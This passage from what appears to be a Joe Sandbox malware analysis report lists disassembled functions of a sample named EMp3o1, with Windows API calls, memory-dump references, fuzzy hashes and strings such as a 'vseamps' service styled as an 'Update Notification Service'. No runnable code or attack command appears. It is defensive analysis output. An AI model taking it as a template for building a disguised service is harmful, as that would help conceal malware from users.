                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: AddressFreeLibraryProc
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3013587201-537541572
                                                • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                • Instruction ID: 710f75fabd0ed5f37695d9b454f0ac1da3e4c3e5e763f4e31e37361b3c13689b
                                                • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                • Instruction Fuzzy Hash: 7641C221B1BA0281EA258B16AC306BA3391BF45BF0F198535DD9D47796EF3CE425E34C
                                                Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                • API String ID: 1119674940-1966266597
                                                • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                • API String ID: 3702919091-996641649
                                                • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$Info
                                                • String ID:
                                                • API String ID: 1775632426-0
                                                • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                Function 00007FFDAC08712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC0871B1
                                                • GetLastError.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC0871BF
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC0871E9
                                                • FreeLibrary.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC087257
                                                • GetProcAddress.KERNEL32(?,?,?,00007FFDAC0872EB,?,?,?,00007FFDAC083EC0,?,?,?,?,00007FFDAC083CFD), ref: 00007FFDAC087263
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                • Instruction ID: fedddd8beeefe34580c3dfcc8f34584884c511130896212257d8fadb8fadfdc7
                                                • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                • Instruction Fuzzy Hash: 4331F421B1BA41D1EE229B0AA4206793794BF48BF0F598634EE1D07796DF3CE460930C
                                                Function 00007FFDAC089444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value$ErrorLast
                                                • String ID:
                                                • API String ID: 2506987500-0
                                                • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                • Instruction ID: 20058370d24f45e316c6e4d971f50ae49fd00d477215173bf89466d271f7bb38
                                                • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                • Instruction Fuzzy Hash: 3C216A20B0F24249FA74B321597163972929F44BF0F548734E96E06BD7EF2CE461A30C
                                                Function 00007FFDAC090100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                • Instruction ID: f2d9db406b6c28c3681bf1c1f7687f7969d2c7e6f173af5da9effb1630ac19cb
                                                • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                • Instruction Fuzzy Hash: B8118E21B19B4186E7508B52E864329B6A0FB88FF4F004234EA5E87BA6CF3CD564974C
                                                Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                  • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                  • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                  • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                  • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                  • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                  • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                  • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                  • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                  • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                  • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                  • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                  • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                  • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                  • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                  • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                  • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                  • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                  • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                  • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                  • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                  • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                  • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                • String ID: vseamps
                                                • API String ID: 3197017603-3944098904
                                                • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Messagesprintf_s
                                                • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                • API String ID: 2642950106-3610746849
                                                • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Heap$FreeProcess
                                                • String ID:
                                                • API String ID: 3859560861-0
                                                • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 319667368-0
                                                • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                  • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765360873.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                • Associated: 00000005.00000002.2765344950.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765429932.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000005.00000002.2765446190.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_140000000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                • String ID:
                                                • API String ID: 1390108997-0
                                                • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                Function 00007FFDAC084CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 3523768491-393685449
                                                • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                • Instruction ID: 8472557886d6eeb6ee8208f22d64b3934028815341dc96c2cf46a9fc311ba589
                                                • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                • Instruction Fuzzy Hash: A9E19132A097828AEB309F78D4603AD77A0FB457A8F158135DA8D57797CF38E4A1D708
                                                Function 00007FFDAC0895BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC0895CB
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC089601
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC08962E
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC08963F
                                                • FlsSetValue.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC089650
                                                • SetLastError.KERNEL32(?,?,?,00007FFDAC088BC9,?,?,?,?,00007FFDAC088C14), ref: 00007FFDAC08966B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2765479883.00007FFDAC081000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC080000, based on PE: true
                                                • Associated: 00000005.00000002.2765462706.00007FFDAC080000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765503012.00007FFDAC092000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765556416.00007FFDAC09D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000005.00000002.2765573557.00007FFDAC09F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffdac080000_EMp3o1.jbxd
                                                Similarity
                                                • API ID: Value$ErrorLast
                                                • String ID:
                                                • API String ID: 2506987500-0
                                                • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
